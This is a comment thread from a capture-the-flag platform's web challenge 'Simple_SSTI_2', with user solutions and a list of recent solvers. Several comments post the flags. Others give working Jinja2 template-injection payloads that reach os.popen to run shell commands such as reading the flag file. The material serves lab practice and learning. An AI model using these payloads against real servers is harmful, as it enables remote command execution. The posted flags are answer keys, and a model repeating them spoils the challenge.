Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16470
提  示:
描  述:
Simple_SSTI_2
评论
WilliamTao 3年前

flag{10bfab153a960093403c805acc48e1ee}

回复 0

maq19 3年前

模板注入: flag{07fcf9e36ba0522ae52e1945047a4202}

回复 0

SecI302 3年前

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0

SecI302 3年前

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0

⎝ZJJARY 3年前

①{{[].__class__.__base__.__subclasses__()}}查看所有类,并找到warnings.catch_warnings类,逐个计数或者写脚本得到序号为177 ②{{[].__class__.__base__.__subclasses__()[177].__init__.__globals__['__builtins__']['__imp'+'ort__']('os

回复 2

g0207l0706 3年前

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

回复 1

18270938076 3年前

kali 进半天都没有进去啊

回复 0

kangkangki 3年前

flag{316fbc12e983db18c0584de9a1cbcee3}

回复 0

PlusJia 3年前

https://blog.csdn.net/weixin_43651049/article/details/123391624?ops_request_misc=&request_id=&biz_id=102&utm_term=Simple_SSTI_2&utm_medium=distribute.pc_search_result.none-task-blog-2~

回复 0

gtg2619 3年前

tplmap能出

回复 1

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

shu-jia 攻破了该题 2天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 6天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 7天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 12天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
kitniu 攻破了该题 15天前
问题反馈